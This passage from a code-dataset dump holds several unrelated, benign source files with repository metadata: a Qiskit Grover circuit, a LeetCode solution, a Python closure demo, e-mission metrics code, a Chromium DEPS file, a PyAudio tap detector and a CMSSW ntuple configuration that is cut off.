        prog.h(input_qubit[0]) # number=1
        prog.h(input_qubit[1]) # number=2
        prog.h(input_qubit[2]) # number=7
        prog.h(input_qubit[3]) # number=8
        prog.h(input_qubit[0]) # number=31
        prog.cz(input_qubit[1],input_qubit[0]) # number=32
        prog.h(input_qubit[0]) # number=33
        prog.h(input_qubit[1]) # number=44
        prog.cz(input_qubit[0],input_qubit[1]) # number=45
        prog.h(input_qubit[1]) # number=46
        prog.cx(input_qubit[0],input_qubit[1]) # number=47
        prog.x(input_qubit[1]) # number=48
        prog.cx(input_qubit[0],input_qubit[1]) # number=49
        prog.cx(input_qubit[0],input_qubit[1]) # number=42
        prog.x(input_qubit[0]) # number=26
        prog.cx(input_qubit[1],input_qubit[0]) # number=27
        prog.h(input_qubit[1]) # number=37
        prog.cz(input_qubit[0],input_qubit[1]) # number=38
        prog.h(input_qubit[1]) # number=39
        prog.x(input_qubit[1]) # number=35
        prog.cx(input_qubit[0],input_qubit[1]) # number=36
        prog.x(input_qubit[2]) # number=11
        prog.x(input_qubit[3]) # number=12
        prog.cx(input_qubit[3],input_qubit[2]) # number=43

        if n>=2:
            prog.mcu1(pi,input_qubit[1:],input_qubit[0])

        prog.x(input_qubit[0]) # number=13
        prog.cx(input_qubit[0],input_qubit[1]) # number=22
        prog.x(input_qubit[1]) # number=23
        prog.cx(input_qubit[0],input_qubit[1]) # number=24
        prog.x(input_qubit[2]) # number=15
        prog.x(input_qubit[1]) # number=29
        prog.y(input_qubit[4]) # number=28
        prog.x(input_qubit[3]) # number=16

    prog.h(input_qubit[0]) # number=17
    prog.h(input_qubit[1]) # number=18
    prog.h(input_qubit[2]) # number=19
    prog.h(input_qubit[3]) # number=20

    # circuit end

    for i in range(n):
        prog.measure(input_qubit[i], classical[i])

    return prog
if __name__ == '__main__':
    # Grover search for the all-zeros key: f(x) = "1" iff x == "00000".
    key = "00000"
    f = lambda rep: str(int(rep == key))
    prog = make_circuit(5,f)

    # Run on the least-busy real IBM Q backend with enough qubits.
    IBMQ.load_account()
    provider = IBMQ.get_provider(hub='ibm-q')
    provider.backends()
    backend = least_busy(provider.backends(filters=lambda x: x.configuration().n_qubits >= 2 and not x.configuration().simulator and x.status().operational == True))

    sample_shot =7924
    info = execute(prog, backend=backend, shots=sample_shot).result().get_counts()
    # Transpile against a mock device for a comparable depth measurement.
    backend = FakeVigo()
    circuit1 = transpile(prog,backend,optimization_level=2)

    # Dump counts and the transpiled circuit for offline comparison.
    writefile = open("../data/startQiskit_QC1087.csv","w")
    print(info,file=writefile)
    print("results end", file=writefile)
    print(circuit1.depth(),file=writefile)
    print(circuit1,file=writefile)
    writefile.close()
| [
"[email protected]"
] | |
7620c16b70a5011be660188673a3d70cf943f517 | f305f84ea6f721c2391300f0a60e21d2ce14f2a5 | /4_set/6265. 统计相似字符串对的数目-frozenset.py | a37db3b54e7eb3a906c7279c7abccaff4e9548a7 | [] | no_license | 981377660LMT/algorithm-study | f2ada3e6959338ae1bc21934a84f7314a8ecff82 | 7e79e26bb8f641868561b186e34c1127ed63c9e0 | refs/heads/master | 2023-09-01T18:26:16.525579 | 2023-09-01T12:21:58 | 2023-09-01T12:21:58 | 385,861,235 | 225 | 24 | null | null | null | null | UTF-8 | Python | false | false | 786 | py | from typing import List
from collections import Counter
# 给你一个下标从 0 开始的字符串数组 words 。
# 如果两个字符串由相同的字符组成,则认为这两个字符串 相似 。
# 例如,"abca" 和 "cba" 相似,因为它们都由字符 'a'、'b'、'c' 组成。
# 然而,"abacba" 和 "bcfd" 不相似,因为它们不是相同字符组成的。
# 请你找出满足字符串 words[i] 和 words[j] 相似的下标对 (i, j) ,并返回下标对的数目,其中 0 <= i < j <= word.length - 1 。
class Solution:
    def similarPairs(self, words: List[str]) -> int:
        """Count index pairs (i, j), i < j, whose words use the same set of
        characters (e.g. "aba" and "aabb" both use {a, b})."""
        signature_counts = Counter(frozenset(word) for word in words)
        # k words sharing a character-set signature contribute C(k, 2) pairs.
        return sum(k * (k - 1) // 2 for k in signature_counts.values())
| [
"[email protected]"
] | |
8ba8ac218525fe114aef069e508dbd337d9c8b19 | eeeba145ae4b6df7b5d95cc70d476a01dba6c5fe | /PythonStudy/func_test/lambda_test.py | 52286c0eb1edd88d86870e484d66ce35fd90a1e7 | [] | no_license | liujinguang/pystudy | 0ceb58652777f99d4cfe3e143ff11ea44c7e3a74 | d2e4366cfd5e74197fc9ec560eb50dbd508cbcc2 | refs/heads/master | 2020-12-23T13:11:42.556255 | 2017-06-28T13:03:26 | 2017-06-28T13:03:26 | 92,559,516 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 356 | py | #/usr/bin/python
# -*- coding: UTF-8 -*-
'''
Created on 2017年5月31日
@author: bob
'''
def multipliers():
    """Return four lambdas that all close over the SAME loop variable.

    Closures bind names, not values, so every lambda sees the loop
    variable's final value (3) -- the classic late-binding demonstration.
    """
    funcs = []
    for i in range(4):
        funcs.append(lambda x: i * x)
    return funcs
print [m(2) for m in multipliers()]
def multipliers_v1():
    """Yield multiplier lambdas one at a time.

    A caller that invokes each lambda as it is produced sees the loop
    variable's value at that moment (0, 1, 2, 3); a caller that first
    exhausts the generator sees only the final value, like multipliers().
    """
    for factor in range(4):
        yield lambda x: factor * x
print [m(2) for m in multipliers_v1()]
if __name__ == '__main__':
pass | [
"[email protected]"
] | |
d31988b13f42acd2ad1577ce07a0b7e8506e7ce8 | 925dc0d981391e4538401a7af88fcac25921ccab | /emission/net/api/metrics.py | 20e6b0f9fd1e9cee84bd6847b0c0a85cce6b0ff9 | [
"BSD-3-Clause"
] | permissive | gtfierro/e-mission-server | 0e75742301b3de8d8dd71e6bc3a6e7c0bfe48ee7 | b10c5da080b741b28eccf8cb7413ace3063eaaac | refs/heads/master | 2021-01-19T11:58:24.441986 | 2016-09-30T09:00:54 | 2016-09-30T09:00:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,203 | py | import logging
import emission.analysis.result.metrics.time_grouping as earmt
import emission.analysis.result.metrics.simple_metrics as earms
def summarize_by_timestamp(user_id, start_ts, end_ts, freq, metric_name):
    """Summarize `metric_name` between two unix timestamps, grouped at `freq`."""
    return _call_group_fn(earmt.group_by_timestamp, user_id, start_ts, end_ts,
                          freq, metric_name)
def summarize_by_local_date(user_id, start_ld, end_ld, freq_name, metric_name):
    """Summarize `metric_name` between two local dates.

    `freq_name` must be a member name of earmt.LocalFreq.
    """
    local_freq = earmt.LocalFreq[freq_name]
    return _call_group_fn(earmt.group_by_local_date, user_id, start_ld, end_ld,
                          local_freq, metric_name)
def _call_group_fn(group_fn, user_id, start_time, end_time, freq, metric_name):
    """Run `group_fn` for the aggregate population (user_id=None) and, when a
    concrete user is given, for that user as well; return both result lists."""
    summary_fn = earms.get_summary_fn(metric_name)
    logging.debug("%s -> %s" % (metric_name, summary_fn))

    def run_for(uid):
        # group_fn returns a dict whose "result" entry holds the metric rows.
        return group_fn(uid, start_time, end_time, freq, summary_fn)["result"]

    ret_dict = {"aggregate_metrics": run_for(None)}
    if user_id is not None:
        ret_dict["user_metrics"] = run_for(user_id)
    return ret_dict
| [
"[email protected]"
] | |
9c263e0f31066de90cfb7168e44d3f1faaff0d99 | a3d6556180e74af7b555f8d47d3fea55b94bcbda | /ios/chrome/browser/flags/DEPS | 458d0f02f4f533615b90bc6bce32a1ece69f84f1 | [
"BSD-3-Clause"
] | permissive | chromium/chromium | aaa9eda10115b50b0616d2f1aed5ef35d1d779d6 | a401d6cf4f7bf0e2d2e964c512ebb923c3d8832c | refs/heads/main | 2023-08-24T00:35:12.585945 | 2023-08-23T22:01:11 | 2023-08-23T22:01:11 | 120,360,765 | 17,408 | 7,102 | BSD-3-Clause | 2023-09-10T23:44:27 | 2018-02-05T20:55:32 | null | UTF-8 | Python | false | false | 405 | specific_include_rules = {
# Flag list can depends on everything.
"^about_flags.mm": [
"+ios/chrome/browser",
],
"^ios_chrome_field_trials.mm": [
"+ios/chrome/browser/variations",
"+ios/chrome/browser/ui/content_suggestions",
"+ios/chrome/browser/ui/first_run",
"+ios/chrome/browser/ui/ntp",
],
"^system_flags.mm": [
"+ios/chrome/browser/ui/ui_feature_flags.h",
]
}
| [
"[email protected]"
] | ||
865e42f9823db183fe0a661b7ee6ecce678f9a25 | ae411ea0e0c373d18681d707800995264379be25 | /mic.py | df6a5aaf7b2e2a2e146caccea681f70963c889f7 | [] | no_license | Symfomany/tensor | 22ad4b0710d705d1ec47e3512431c2ca74ca3948 | 2b8471f7aab6a7a234bd89942118bbadf4058352 | refs/heads/master | 2022-12-21T14:53:03.349221 | 2019-02-21T10:39:31 | 2019-02-21T10:39:31 | 171,100,643 | 0 | 0 | null | 2022-12-09T13:17:30 | 2019-02-17T08:51:46 | Jupyter Notebook | UTF-8 | Python | false | false | 4,912 | py | #!/usr/bin/env python
import pyaudio
import struct
import math
import time,sys
import threading
INITIAL_TAP_THRESHOLD = 0.010
FORMAT = pyaudio.paInt16
SHORT_NORMALIZE = (1.0/32768.0)
CHANNELS = 1
RATE = 16000
INPUT_BLOCK_TIME = 0.05
INPUT_FRAMES_PER_BLOCK = int(RATE*INPUT_BLOCK_TIME)
OVERSENSITIVE = 15.0/INPUT_BLOCK_TIME
UNDERSENSITIVE = 120.0/INPUT_BLOCK_TIME # if we get this many quiet blocks in a row, decrease the threshold
MAX_TAP_BLOCKS = 0.15/INPUT_BLOCK_TIME # if the noise was longer than this many blocks, it's not a 'tap'
def get_rms(block, short_normalize=1.0 / 32768.0):
    """Return the root-mean-square amplitude of a block of raw audio.

    RMS amplitude is the square root of the mean of the squared sample
    amplitudes over the block; it tracks the block's loudness.

    Parameters
    ----------
    block : bytes
        Raw signed 16-bit PCM samples (two bytes per sample, native order).
    short_normalize : float, optional
        Scale factor mapping a 16-bit sample into [-1.0, 1.0].
        Defaults to 1/32768.

    Returns
    -------
    float
        RMS amplitude in [0.0, 1.0]; 0.0 for an empty block.
    """
    # Two bytes per 16-bit sample.  Integer division matters: on Python 3,
    # len(block)/2 is a float and "%dh" would produce a broken struct format.
    count = len(block) // 2
    if count == 0:
        # Avoid ZeroDivisionError on an empty capture.
        return 0.0
    shorts = struct.unpack("%dh" % count, block)

    # Mean of the squared, normalized samples.
    sum_squares = 0.0
    for sample in shorts:
        # sample is a signed short in +/- 32768; normalize it to +/- 1.0.
        n = sample * short_normalize
        sum_squares += n * n
    return math.sqrt(sum_squares / count)
# ---- stream setup: one mono 16 kHz input stream --------------------------
pa = pyaudio.PyAudio()

stream = pa.open(format = FORMAT,
                 channels = CHANNELS,
                 rate = RATE,
                 input = True,
                 frames_per_buffer = INPUT_FRAMES_PER_BLOCK)

# ---- noise-detector state -------------------------------------------------
tap_threshold = INITIAL_TAP_THRESHOLD   # current loudness threshold
noisycount = MAX_TAP_BLOCKS + 1         # consecutive loud blocks seen so far
quietcount = 0                          # consecutive quiet blocks seen so far
errorcount = 0                          # read errors seen so far

for i in range(1000):
    try:
        block = stream.read(INPUT_FRAMES_PER_BLOCK)
    except IOError as e:
        # BUGFIX: was "except (IOError,e):", which raises NameError on
        # Python 2 (e is unbound) and is wrong on Python 3.
        errorcount += 1
        print( "(%d) Error recording: %s"%(errorcount,e) )
        noisycount = 1
        # No valid block was captured, so skip the analysis this iteration
        # (previously `block` could be unbound/stale here).
        continue

    # RMS lets us estimate the amplitude of the streamed audio block.
    amplitude = get_rms(block)
    print(amplitude)
    if amplitude > tap_threshold:
        # Block was loud.
        quietcount = 0
        noisycount += 1
        if noisycount > OVERSENSITIVE:
            tap_threshold *= 1.1    # turn down the sensitivity
    else:
        # Block was quiet: a short preceding burst of noise counts as a tap.
        if 1 <= noisycount <= MAX_TAP_BLOCKS:
            print('tap!')
        noisycount = 0
        quietcount += 1
        if quietcount > UNDERSENSITIVE:
            tap_threshold *= 0.9    # turn up the sensitivity
"[email protected]"
] | |
2975fada24e5de6073f3665b576d5bfed9ad8568 | 17c280ade4159d4d8d5a48d16ba3989470eb3f46 | /16/data/ExoDiBosonResonances/EDBRTreeMaker/test/7.py | 78cf2c490288af70a24998316d1b5ba736dd0d07 | [] | no_license | chengchen1993/run2_ntuple | 798ff18489ff5185dadf3d1456a4462e1dbff429 | c16c2b203c05a3eb77c769f63a0bcdf8b583708d | refs/heads/master | 2021-06-25T18:27:08.534795 | 2021-03-15T06:08:01 | 2021-03-15T06:08:01 | 212,079,804 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 27,621 | py | import FWCore.ParameterSet.Config as cms
process = cms.Process( "TEST" )
#process.options = cms.untracked.PSet(wantSummary = cms.untracked.bool(True))
process.options = cms.untracked.PSet(wantSummary = cms.untracked.bool(True),allowUnscheduled=cms.untracked.bool(True))
#,
# SkipEvent = cms.untracked.vstring('ProductNotFound'))
filterMode = False # True
######## Sequence settings ##########
corrJetsOnTheFly = True
runOnMC = False
runOnSig = False
DOHLTFILTERS = True
#useJSON = not (runOnMC)
#JSONfile = 'Cert_246908-258750_13TeV_PromptReco_Collisions15_25ns_JSON.txt'
#****************************************************************************************************#
#process.load('Configuration/StandardSequences/FrontierConditions_GlobalTag_cff')
process.load('Configuration.StandardSequences.GeometryRecoDB_cff')
process.load('Configuration/StandardSequences/FrontierConditions_GlobalTag_condDBv2_cff')
from Configuration.AlCa.GlobalTag import GlobalTag
if runOnMC:
process.GlobalTag.globaltag = '80X_mcRun2_asymptotic_2016_TrancheIV_v8'#'MCRUN2_74_V9::All'
#process.GlobalTag.globaltag = '94X_mc2017_realistic_v14'#'MCRUN2_74_V9::All'
elif not(runOnMC):
process.GlobalTag.globaltag = '80X_dataRun2_2016SeptRepro_v7'
# https://twiki.cern.ch/twiki/bin/view/CMSPublic/WorkBookMiniAOD2015#ETmiss_filters
# For the RunIISummer15DR74 MC campaing, the process name in PAT.
# For Run2015B PromptReco Data, the process name is RECO.
# For Run2015B re-MiniAOD Data 17Jul2015, the process name is PAT.
hltFiltersProcessName = 'RECO'
if runOnMC:
hltFiltersProcessName = 'PAT' #'RECO'
#if DOHLTFILTERS and not(runOnMC):
process.load('CommonTools.RecoAlgos.HBHENoiseFilterResultProducer_cfi')
process.HBHENoiseFilterResultProducer.minZeros = cms.int32(99999)
process.HBHENoiseFilterResultProducer.IgnoreTS4TS5ifJetInLowBVRegion=cms.bool(False)
process.HBHENoiseFilterResultProducer.defaultDecision = cms.string("HBHENoiseFilterResultRun2Loose")
process.ApplyBaselineHBHENoiseFilter = cms.EDFilter('BooleanFlagFilter',
inputLabel = cms.InputTag('HBHENoiseFilterResultProducer','HBHENoiseFilterResult'),
reverseDecision = cms.bool(False)
)
process.ApplyBaselineHBHEIsoNoiseFilter = cms.EDFilter('BooleanFlagFilter',
inputLabel = cms.InputTag('HBHENoiseFilterResultProducer','HBHEIsoNoiseFilterResult'),
reverseDecision = cms.bool(False)
)
######### read JSON file for data ##########
'''if not(runOnMC) and useJSON:
import FWCore.PythonUtilities.LumiList as LumiList
import FWCore.ParameterSet.Types as CfgTypes
process.source.lumisToProcess = CfgTypes.untracked(CfgTypes.VLuminosityBlockRange())
myLumis = LumiList.LumiList(filename = JSONfile).getCMSSWString().split(',')
process.source.lumisToProcess.extend(myLumis)
'''
# ---------------------------------------------------------
# DeepAK8: set up TransientTrackBuilder
process.load('Configuration.StandardSequences.MagneticField_cff')
process.TransientTrackBuilderESProducer = cms.ESProducer("TransientTrackBuilderESProducer",
ComponentName=cms.string('TransientTrackBuilder')
)
# ---------------------------------------------------------
####### Redo Jet clustering sequence ##########
from RecoJets.Configuration.RecoPFJets_cff import ak4PFJetsCHS, ak8PFJetsCHS, ak8PFJetsCHSPruned, ak8PFJetsCHSSoftDrop, ak8PFJetsCHSPrunedMass, ak8PFJetsCHSSoftDropMass# , ak8PFJetsCSTrimmed, ak8PFJetsCSFiltered, ak8PFJetsCHSFilteredMass, ak8PFJetsCHSTrimmedMass
from CommonTools.PileupAlgos.Puppi_cff import puppi
process.puppi = puppi.clone()
process.puppi.useExistingWeights = True
process.puppi.candName = cms.InputTag('packedPFCandidates')
process.puppi.vertexName = cms.InputTag('offlineSlimmedPrimaryVertices')
process.ak8PFJetsCHS = ak8PFJetsCHS.clone( src = 'puppi', jetPtMin = 100.0 )
process.ak8PFJetsCHSPruned = ak8PFJetsCHSPruned.clone( src = 'puppi', jetPtMin = 100.0 )
process.ak8PFJetsCHSPrunedMass = ak8PFJetsCHSPrunedMass.clone()
process.ak8PFJetsCHSSoftDrop = ak8PFJetsCHSSoftDrop.clone( src = 'puppi', jetPtMin = 100.0 )
process.ak8PFJetsCHSSoftDropMass = ak8PFJetsCHSSoftDropMass.clone()
process.NjettinessAK8 = cms.EDProducer("NjettinessAdder",
src = cms.InputTag("ak8PFJetsCHS"),
Njets = cms.vuint32(1, 2, 3, 4),
# variables for measure definition :
measureDefinition = cms.uint32( 0 ), # CMS default is normalized measure
beta = cms.double(1.0), # CMS default is 1
R0 = cms.double( 0.8 ), # CMS default is jet cone size
Rcutoff = cms.double( 999.0), # not used by default
# variables for axes definition :
axesDefinition = cms.uint32( 6 ), # CMS default is 1-pass KT axes
nPass = cms.int32(0), # not used by default
akAxesR0 = cms.double(-999.0) # not used by default
)
process.substructureSequence = cms.Sequence()
process.substructureSequence+=process.puppi
process.substructureSequence+=process.ak8PFJetsCHS
process.substructureSequence+=process.NjettinessAK8
process.substructureSequence+=process.ak8PFJetsCHSPruned
process.substructureSequence+=process.ak8PFJetsCHSPrunedMass
process.substructureSequence+=process.ak8PFJetsCHSSoftDrop
process.substructureSequence+=process.ak8PFJetsCHSSoftDropMass
####### Redo pat jets sequence ##########
process.redoPatJets = cms.Sequence()
process.redoPrunedPatJets = cms.Sequence()
process.redoSoftDropPatJets = cms.Sequence()
from ExoDiBosonResonances.EDBRJets.redoPatJets_cff import patJetCorrFactorsAK8, patJetsAK8, selectedPatJetsAK8
# Redo pat jets from ak8PFJetsCHS
process.patJetCorrFactorsAK8 = patJetCorrFactorsAK8.clone( src = 'ak8PFJetsCHS' )
process.patJetsAK8 = patJetsAK8.clone( jetSource = 'ak8PFJetsCHS' )
process.patJetsAK8.userData.userFloats.src = [ cms.InputTag("ak8PFJetsCHSPrunedMass"), cms.InputTag("ak8PFJetsCHSSoftDropMass"), cms.InputTag("NjettinessAK8:tau1"), cms.InputTag("NjettinessAK8:tau2"), cms.InputTag("NjettinessAK8:tau3"), cms.InputTag("NjettinessAK8:tau4")]
process.patJetsAK8.jetCorrFactorsSource = cms.VInputTag( cms.InputTag("patJetCorrFactorsAK8") )
process.selectedPatJetsAK8 = selectedPatJetsAK8.clone( cut = cms.string('pt > 100') )
process.redoPatJets+=process.patJetCorrFactorsAK8
process.redoPatJets+=process.patJetsAK8
process.redoPatJets+=process.selectedPatJetsAK8
# Redo pat jets ak8PFJetsCHSPruned
process.patJetCorrFactorsAK8Pruned = patJetCorrFactorsAK8.clone( src = 'ak8PFJetsCHSPruned' )
process.patJetsAK8Pruned = patJetsAK8.clone( jetSource = 'ak8PFJetsCHSPruned' )
process.patJetsAK8Pruned.userData.userFloats.src = [ "" ]
#process.patJetsAK8Pruned.userData.userFloats =cms.PSet(src = cms.VInputTag(""))
process.patJetsAK8Pruned.jetCorrFactorsSource = cms.VInputTag( cms.InputTag("patJetCorrFactorsAK8Pruned") )
process.selectedPatJetsAK8Pruned = selectedPatJetsAK8.clone(cut = 'pt > 100', src = "patJetsAK8Pruned")
process.redoPrunedPatJets+=process.patJetCorrFactorsAK8Pruned
process.redoPrunedPatJets+=process.patJetsAK8Pruned
process.redoPrunedPatJets+=process.selectedPatJetsAK8Pruned
# Redo pat jets ak8PFJetsCHSSoftDrop
process.patJetCorrFactorsAK8Softdrop = patJetCorrFactorsAK8.clone( src = 'ak8PFJetsCHSSoftDrop' )
process.patJetsAK8Softdrop = patJetsAK8.clone( jetSource = 'ak8PFJetsCHSSoftDrop' )
process.patJetsAK8Softdrop.userData.userFloats.src = [ "" ]
#process.patJetsAK8Softdrop.userData.userFloats =cms.PSet(src = cms.VInputTag(""))
process.patJetsAK8Softdrop.jetCorrFactorsSource = cms.VInputTag( cms.InputTag("patJetCorrFactorsAK8Softdrop") )
process.selectedPatJetsAK8Softdrop = selectedPatJetsAK8.clone(cut = 'pt > 100', src = "patJetsAK8Softdrop")
from PhysicsTools.PatAlgos.tools.jetTools import addJetCollection
## PATify soft drop subjets
addJetCollection(
process,
labelName = 'AK8SoftDropSubjets',
jetSource = cms.InputTag('ak8PFJetsCHSSoftDrop','SubJets'),
algo = 'ak', # needed for subjet flavor clustering
rParam = 0.8, # needed for subjet flavor clustering
getJetMCFlavour = False,
pvSource = cms.InputTag( 'offlineSlimmedPrimaryVertices' ),
genJetCollection = cms.InputTag('slimmedGenJets'),
genParticles = cms.InputTag( 'prunedGenParticles' ),
btagDiscriminators = ['None'],
jetCorrections = ('AK4PFPuppi', ['L2Relative', 'L3Absolute'], 'None'),
# explicitJTA = True, # needed for subjet b tagging
# svClustering = True, # needed for subjet b tagging
# fatJets=cms.InputTag('ak8PFJetsCHS'), # needed for subjet flavor clustering
# groomedFatJets=cms.InputTag('ak8PFJetsCHSSoftDrop') # needed for subjet flavor clustering
)
#'''
#from RecoBTag.DeepFlavour.DeepFlavourJetTagsProducer_cfi import *
# this loads all available b-taggers
#process.load("RecoBTag.Configuration.RecoBTag_cff")
#process.load("RecoBTag.DeepFlavour.DeepFlavourJetTagsProducer_cfi")
#process.load("RecoBTag.DeepFlavour.deepFlavour_cff")
#'''
from RecoBTag.Configuration.RecoBTag_EventContent_cff import *
from RecoBTag.Configuration.RecoBTag_cff import *
from RecoBTag.DeepFlavour.DeepFlavourJetTagsProducer_cfi import deepFlavourJetTags
from RecoBTag.DeepFlavour.deepFlavour_cff import *
from PhysicsTools.PatAlgos.tools.jetTools import updateJetCollection
updateJetCollection(
process,
labelName = 'DeepFlavour',
jetSource = cms.InputTag('cleanPuppiAK4'),
pvSource = cms.InputTag('offlineSlimmedPrimaryVertices'),
svSource = cms.InputTag('slimmedSecondaryVertices'),
jetCorrections = ('AK4PFchs', cms.vstring(['L1FastJet', 'L2Relative', 'L3Absolute']), 'None'),
btagDiscriminators = ['deepFlavourJetTags:probb', 'deepFlavourJetTags:probbb','deepFlavourJetTags:probc','deepFlavourJetTags:probudsg','deepFlavourJetTags:probcc'],
postfix='NewDFTraining'
)
#process.selectedUpdatedPatJetsDeepFlavourNewDFTraining.userData.userFloats.src =[]
#'''
'''
process.patjets = cms.EDAnalyzer('EDBRTreeMaker',
PatJets = cms.InputTag("selectedUpdatedPatJets"),
PTMin = cms.double(-1),
BTag = cms.string("deepFlavourJetTags:probb"),
)
'''
process.selectedPatJetsAK8SoftDropPacked = cms.EDProducer("BoostedJetMerger",
jetSrc = cms.InputTag("selectedPatJetsAK8Softdrop"),
subjetSrc = cms.InputTag("selectedPatJetsAK8SoftDropSubjets")
)
process.redoSoftDropPatJets+=process.patJetCorrFactorsAK8Softdrop
process.redoSoftDropPatJets+=process.patJetsAK8Softdrop
process.redoSoftDropPatJets+=process.selectedPatJetsAK8Softdrop
option = 'RECO'
process.load("ExoDiBosonResonances.EDBRCommon.goodMuons_cff")
process.load("ExoDiBosonResonances.EDBRCommon.goodElectrons_cff")
process.load("ExoDiBosonResonances.EDBRCommon.goodJets_cff")
process.load("ExoDiBosonResonances.EDBRCommon.leptonicW_cff")
process.load("ExoDiBosonResonances.EDBRCommon.hadronicW_cff")
process.load("ExoDiBosonResonances.EDBRCommon.goodPuppi_cff")
if option == 'RECO':
process.goodMuons.src = "slimmedMuons"
process.goodElectrons.src = "slimmedElectrons"
process.goodJets.src = "slimmedJetsAK8"
# process.goodJets.src = "selectedPatJetsAK8"
process.Wtoenu.MET = "slimmedMETs"
process.Wtomunu.MET = "slimmedMETs"
process.goodPuppi.src = "selectedPatJetsAK8"
process.goodOfflinePrimaryVertex = cms.EDFilter("VertexSelector",
src = cms.InputTag("offlineSlimmedPrimaryVertices"),
cut = cms.string("chi2!=0 && ndof >= 4.0 && abs(z) <= 24.0 && abs(position.Rho) <= 2.0"),
filter = cms.bool(True)
)
if option == 'RECO':
process.hadronicV.cut = ' '
if option == 'GEN':
process.hadronicV.cut = ' '
WBOSONCUT = "pt > 200.0"
process.leptonicVSelector = cms.EDFilter("CandViewSelector",
src = cms.InputTag("leptonicV"),
cut = cms.string( WBOSONCUT ),
filter = cms.bool(True)
)
process.leptonicVFilter = cms.EDFilter("CandViewCountFilter",
src = cms.InputTag("leptonicV"),
minNumber = cms.uint32(1),
filter = cms.bool(True)
)
process.hadronicVFilter = cms.EDFilter("CandViewCountFilter",
src = cms.InputTag("hadronicV"),
minNumber = cms.uint32(1),
filter = cms.bool(True)
)
process.graviton = cms.EDProducer("CandViewCombiner",
decay = cms.string("leptonicV hadronicV"),
checkCharge = cms.bool(False),
cut = cms.string("mass > 180"),
roles = cms.vstring('leptonicV', 'hadronicV'),
)
process.gravitonFilter = cms.EDFilter("CandViewCountFilter",
src = cms.InputTag("graviton"),
minNumber = cms.uint32(1),
filter = cms.bool(True)
)
from PhysicsTools.SelectorUtils.tools.vid_id_tools import *
switchOnVIDElectronIdProducer(process, DataFormat.MiniAOD)
my_id_modules = ['RecoEgamma.ElectronIdentification.Identification.heepElectronID_HEEPV70_cff']
for idmod in my_id_modules:
setupAllVIDIdsInModule(process,idmod,setupVIDElectronSelection)
process.leptonSequence = cms.Sequence(process.muSequence +
process.egmGsfElectronIDSequence*process.eleSequence +
process.leptonicVSequence +
process.leptonicVSelector +
process.leptonicVFilter )
process.jetSequence = cms.Sequence(process.substructureSequence +
process.redoPatJets +
process.redoPrunedPatJets+
process.redoSoftDropPatJets+
process.fatJetsSequence +
process.fatPuppiSequence+
process.hadronicV +
process.hadronicVFilter)
process.gravitonSequence = cms.Sequence(process.graviton +
process.gravitonFilter)
if filterMode == False:
process.goodOfflinePrimaryVertex.filter = False
process.Wtomunu.cut = ''
process.Wtoenu.cut = ''
process.leptonicVSelector.filter = False
process.leptonicVSelector.cut = ''
process.hadronicV.cut = ''
process.graviton.cut = ''
process.leptonicVFilter.minNumber = 0
process.hadronicVFilter.minNumber = 0
process.gravitonFilter.minNumber = 0
process.load('RecoMET.METFilters.BadPFMuonFilter_cfi')
process.load("RecoMET.METFilters.BadChargedCandidateFilter_cfi")
process.BadPFMuonFilter.muons = cms.InputTag("slimmedMuons")
process.BadPFMuonFilter.PFCandidates = cms.InputTag("packedPFCandidates")
process.BadChargedCandidateFilter.muons = cms.InputTag("slimmedMuons")
process.BadChargedCandidateFilter.PFCandidates = cms.InputTag("packedPFCandidates")
process.metfilterSequence = cms.Sequence(process.BadPFMuonFilter+process.BadChargedCandidateFilter)
######### JEC ########
METS = "slimmedMETs"
jetsAK8 = "slimmedJetsAK8"
jetsAK8pruned = "slimmedJetsAK8"
jetsAK8softdrop = "slimmedJetsAK8"
jetsAK8puppi = "cleanPuppi"
if runOnMC:
jecLevelsAK8chs = [
'Summer16_23Sep2016V3_MC_L1FastJet_AK8PFchs.txt',
'Summer16_23Sep2016V3_MC_L2Relative_AK8PFchs.txt',
'Summer16_23Sep2016V3_MC_L3Absolute_AK8PFchs.txt'
]
jecLevelsAK8chsGroomed = [
'Summer16_23Sep2016V3_MC_L2Relative_AK8PFchs.txt',
'Summer16_23Sep2016V3_MC_L3Absolute_AK8PFchs.txt'
]
jecLevelsAK8puppi = [
'Summer16_23Sep2016V3_MC_L1FastJet_AK8PFPuppi.txt',
'Summer16_23Sep2016V3_MC_L2Relative_AK8PFPuppi.txt',
'Summer16_23Sep2016V3_MC_L3Absolute_AK8PFPuppi.txt'
]
jecLevelsAK8puppiGroomed = [
'Summer16_23Sep2016V3_MC_L2Relative_AK8PFPuppi.txt',
'Summer16_23Sep2016V3_MC_L3Absolute_AK8PFPuppi.txt'
]
BjecLevelsAK4chs = [
'Summer16_23Sep2016V3_MC_L1FastJet_AK4PFPuppi.txt',
'Summer16_23Sep2016V3_MC_L2Relative_AK4PFPuppi.txt',
'Summer16_23Sep2016V3_MC_L3Absolute_AK4PFPuppi.txt'
]
jecLevelsAK4chs = [
'Summer16_23Sep2016V3_MC_L1FastJet_AK4PFchs.txt',
'Summer16_23Sep2016V3_MC_L2Relative_AK4PFchs.txt',
'Summer16_23Sep2016V3_MC_L3Absolute_AK4PFchs.txt'
]
else:
jecLevelsAK8chs = [
'Summer16_23Sep2016BCDV4_DATA_L1FastJet_AK8PFchs.txt',
'Summer16_23Sep2016BCDV4_DATA_L2Relative_AK8PFchs.txt',
'Summer16_23Sep2016BCDV4_DATA_L3Absolute_AK8PFchs.txt',
'Summer16_23Sep2016BCDV4_DATA_L2L3Residual_AK8PFchs.txt'
]
jecLevelsAK8chsGroomed = [
'Summer16_23Sep2016BCDV4_DATA_L2Relative_AK8PFchs.txt',
'Summer16_23Sep2016BCDV4_DATA_L3Absolute_AK8PFchs.txt',
'Summer16_23Sep2016BCDV4_DATA_L2L3Residual_AK8PFchs.txt'
]
jecLevelsAK8puppi = [
'Summer16_23Sep2016BCDV4_DATA_L1FastJet_AK8PFPuppi.txt',
'Summer16_23Sep2016BCDV4_DATA_L2Relative_AK8PFPuppi.txt',
'Summer16_23Sep2016BCDV4_DATA_L3Absolute_AK8PFPuppi.txt',
'Summer16_23Sep2016BCDV4_DATA_L2L3Residual_AK8PFPuppi.txt'
]
jecLevelsAK8puppiGroomed = [
'Summer16_23Sep2016BCDV4_DATA_L2Relative_AK8PFPuppi.txt',
'Summer16_23Sep2016BCDV4_DATA_L3Absolute_AK8PFPuppi.txt',
'Summer16_23Sep2016BCDV4_DATA_L2L3Residual_AK8PFPuppi.txt'
]
BjecLevelsAK4chs = [
